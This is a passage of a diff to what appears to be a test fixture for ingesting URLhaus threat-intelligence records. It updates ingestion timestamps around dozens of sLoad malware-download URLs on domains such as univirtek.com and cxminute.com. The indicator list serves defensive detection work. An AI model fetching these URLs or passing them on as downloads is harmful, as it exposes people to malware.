"{\"id\":\"961474\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961474/\",\"url\":\"https://belfetproduction.com/bella/BRNGRG55D21F394K/map.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3772,7 +3772,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692761262Z", + "ingested": "2021-12-13T08:40:08.025025200Z", "original": "{\"id\":\"961475\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961475/\",\"url\":\"https://cxminute.com/minu/DLLTZN67L20L157J/1x1.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3818,7 +3818,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692764739Z", + "ingested": "2021-12-13T08:40:08.025032300Z", "original": "{\"id\":\"961468\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961468/\",\"url\":\"https://cxminute.com/minu/08035410722/logo.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3864,7 +3864,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692767885Z", + "ingested": "2021-12-13T08:40:08.025039200Z", "original": "{\"id\":\"961469\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961469/\",\"url\":\"https://univirtek.com/viro/GRNZEI60M13G346L/en.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3910,7 +3910,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692771642Z", + "ingested": "2021-12-13T08:40:08.025046300Z", "original": "{\"id\":\"961467\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961467/\",\"url\":\"https://letonguesc.com/leto/03253350239/1x1.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3956,7 +3956,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692775058Z", + "ingested": "2021-12-13T08:40:08.025053300Z", "original": "{\"id\":\"961464\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961464/\",\"url\":\"https://ladiesincode.com/ladi/10582470158/uk.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4002,7 +4002,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692778465Z", + "ingested": "2021-12-13T08:40:08.025060200Z", "original": "{\"id\":\"961465\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961465/\",\"url\":\"https://ladiesincode.com/ladi/BTTLNZ68A56D325C/map.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4048,7 +4048,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692781821Z", + "ingested": "2021-12-13T08:40:08.025067Z", "original": "{\"id\":\"961466\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961466/\",\"url\":\"https://letonguesc.com/leto/NNTLRT68P28A717L/en.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4094,7 +4094,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692785317Z", + "ingested": "2021-12-13T08:40:08.025074Z", "original": "{\"id\":\"961461\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961461/\",\"url\":\"https://univirtek.com/viro/CTTNDR89A19B149W/maps.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4140,7 +4140,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692788604Z", + "ingested": "2021-12-13T08:40:08.025080900Z", "original": "{\"id\":\"961462\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961462/\",\"url\":\"https://cxminute.com/minu/DRSNTN77B16I197U/logo.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4186,7 +4186,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692791840Z", + "ingested": "2021-12-13T08:40:08.025087900Z", "original": "{\"id\":\"961463\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961463/\",\"url\":\"https://univirtek.com/viro/02941830735/uk.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4232,7 +4232,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692795076Z", + "ingested": "2021-12-13T08:40:08.025094700Z", "original": "{\"id\":\"961458\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961458/\",\"url\":\"https://belfetproduction.com/bella/MNSGCM91A04G240K/it.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4278,7 +4278,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692798502Z", + "ingested": "2021-12-13T08:40:08.025101600Z", "original": "{\"id\":\"961459\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961459/\",\"url\":\"https://ladiesincode.com/ladi/03108100615/it.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4324,7 +4324,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692801869Z", + "ingested": "2021-12-13T08:40:08.025108400Z", "original": "{\"id\":\"961460\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961460/\",\"url\":\"https://cxminute.com/minu/PTACSM56A31F604X/en.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4370,7 +4370,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692805395Z", + "ingested": "2021-12-13T08:40:08.025115300Z", "original": "{\"id\":\"961455\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961455/\",\"url\":\"https://univirtek.com/viro/00183050368/en.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4416,7 +4416,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692810865Z", + "ingested": "2021-12-13T08:40:08.025156600Z", "original": "{\"id\":\"961456\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961456/\",\"url\":\"https://cxminute.com/minu/TSNLSN58H30G912H/uk.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4462,7 +4462,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692815133Z", + "ingested": "2021-12-13T08:40:08.025165600Z", "original": "{\"id\":\"961457\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961457/\",\"url\":\"https://letonguesc.com/leto/08658331007/blank.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4508,7 +4508,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692819632Z", + "ingested": "2021-12-13T08:40:08.025172700Z", "original": "{\"id\":\"961450\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961450/\",\"url\":\"https://cxminute.com/minu/01098910324/blank.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4554,7 +4554,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692823279Z", + "ingested": "2021-12-13T08:40:08.025179500Z", "original": "{\"id\":\"961451\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961451/\",\"url\":\"https://univirtek.com/viro/02794390233/uk.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4600,7 +4600,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692826565Z", + "ingested": "2021-12-13T08:40:08.025186300Z", "original": "{\"id\":\"961452\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961452/\",\"url\":\"https://univirtek.com/viro/CSTDNT69D63F754D/en.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4646,7 +4646,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692830572Z", + "ingested": "2021-12-13T08:40:08.025195200Z", "original": "{\"id\":\"961453\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961453/\",\"url\":\"https://univirtek.com/viro/GSTGNE91B06L219W/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4692,7 +4692,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692834299Z", + "ingested": "2021-12-13T08:40:08.025202300Z", "original": "{\"id\":\"961454\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961454/\",\"url\":\"https://univirtek.com/viro/03610140125/map.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4738,7 +4738,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692837455Z", + "ingested": "2021-12-13T08:40:08.025209200Z", "original": "{\"id\":\"961448\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961448/\",\"url\":\"https://belfetproduction.com/bella/CRRLRD74E09A462T/blank.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:49:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4784,7 +4784,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692840461Z", + "ingested": "2021-12-13T08:40:08.025216100Z", "original": "{\"id\":\"961449\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961449/\",\"url\":\"https://univirtek.com/viro/RSTFRZ57T05G337C/maps.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4830,7 +4830,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692843727Z", + "ingested": "2021-12-13T08:40:08.025223Z", "original": "{\"id\":\"961447\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961447/\",\"url\":\"https://letonguesc.com/leto/LBRFNC56S10D952D/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4876,7 +4876,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692847043Z", + "ingested": "2021-12-13T08:40:08.025229900Z", "original": "{\"id\":\"961444\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961444/\",\"url\":\"https://univirtek.com/viro/01669890194/it.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4922,7 +4922,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692850680Z", + "ingested": "2021-12-13T08:40:08.025236800Z", "original": "{\"id\":\"961445\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961445/\",\"url\":\"https://letonguesc.com/leto/GTNNTN60P12H632S/maps.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4968,7 +4968,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692853966Z", + "ingested": "2021-12-13T08:40:08.025243600Z", "original": "{\"id\":\"961446\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961446/\",\"url\":\"https://cxminute.com/minu/ZHOXBN72B06Z210N/en.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5014,7 +5014,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692857333Z", + "ingested": "2021-12-13T08:40:08.025250500Z", "original": "{\"id\":\"961442\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961442/\",\"url\":\"https://letonguesc.com/leto/KHNGGR61S21Z112Y/uk.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5060,7 +5060,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692860529Z", + "ingested": "2021-12-13T08:40:08.025257300Z", "original": "{\"id\":\"961443\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961443/\",\"url\":\"https://ladiesincode.com/ladi/MNRMNL75A12I531F/uk.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5106,7 +5106,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692863715Z", + "ingested": "2021-12-13T08:40:08.025264200Z", "original": "{\"id\":\"961438\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961438/\",\"url\":\"https://ladiesincode.com/ladi/RBGMNL67A02L675L/uk.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5152,7 +5152,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692866931Z", + "ingested": "2021-12-13T08:40:08.025271100Z", "original": "{\"id\":\"961439\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961439/\",\"url\":\"https://letonguesc.com/leto/RSSPPL67P15G535L/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5198,7 +5198,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692870387Z", + "ingested": "2021-12-13T08:40:08.025278100Z", "original": "{\"id\":\"961440\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961440/\",\"url\":\"https://fhivelifestyle.online/nhbrwvdffsgt/adf/uk.css\",\"url_status\":\"offline\",\"host\":\"fhivelifestyle.online\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5244,7 +5244,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692873844Z", + "ingested": "2021-12-13T08:40:08.025285200Z", "original": "{\"id\":\"961441\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961441/\",\"url\":\"https://letonguesc.com/leto/BNTLGU67R11L706R/blank.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5290,7 +5290,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692877130Z", + "ingested": "2021-12-13T08:40:08.025292200Z", "original": "{\"id\":\"961437\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961437/\",\"url\":\"https://cxminute.com/minu/03713610651/map.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5336,7 +5336,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692880366Z", + "ingested": "2021-12-13T08:40:08.025299Z", "original": "{\"id\":\"961436\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961436/\",\"url\":\"https://univirtek.com/viro/01312580507/uk.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5382,7 +5382,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692883943Z", + "ingested": "2021-12-13T08:40:08.025306Z", "original": "{\"id\":\"961431\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961431/\",\"url\":\"https://cxminute.com/minu/FRNRST34B11F843P/blank.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5428,7 +5428,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692887209Z", + "ingested": "2021-12-13T08:40:08.025312800Z", "original": "{\"id\":\"961432\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961432/\",\"url\":\"https://univirtek.com/viro/RCUNDA90D24Z100H/1x1.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5474,7 +5474,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692890986Z", + "ingested": "2021-12-13T08:40:08.025319700Z", "original": "{\"id\":\"961433\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961433/\",\"url\":\"https://univirtek.com/viro/GTTGRI72H19A952D/map.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5520,7 +5520,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692894352Z", + "ingested": "2021-12-13T08:40:08.025326500Z", "original": "{\"id\":\"961434\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961434/\",\"url\":\"https://univirtek.com/viro/00385010103/map.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5566,7 +5566,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692897528Z", + "ingested": "2021-12-13T08:40:08.025333400Z", "original": "{\"id\":\"961435\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961435/\",\"url\":\"https://ladiesincode.com/ladi/04263990162/map.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5612,7 +5612,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692900634Z", + "ingested": "2021-12-13T08:40:08.025340300Z", "original": "{\"id\":\"961428\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961428/\",\"url\":\"https://univirtek.com/viro/BNNSFN74A13G674O/logo.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5658,7 +5658,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692904161Z", + "ingested": "2021-12-13T08:40:08.025347200Z", "original": "{\"id\":\"961429\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961429/\",\"url\":\"https://univirtek.com/viro/RZZCRS93B15G224O/it.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5704,7 +5704,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692907407Z", + "ingested": "2021-12-13T08:40:08.025354100Z", "original": "{\"id\":\"961430\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961430/\",\"url\":\"https://cxminute.com/minu/01495100032/maps.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": 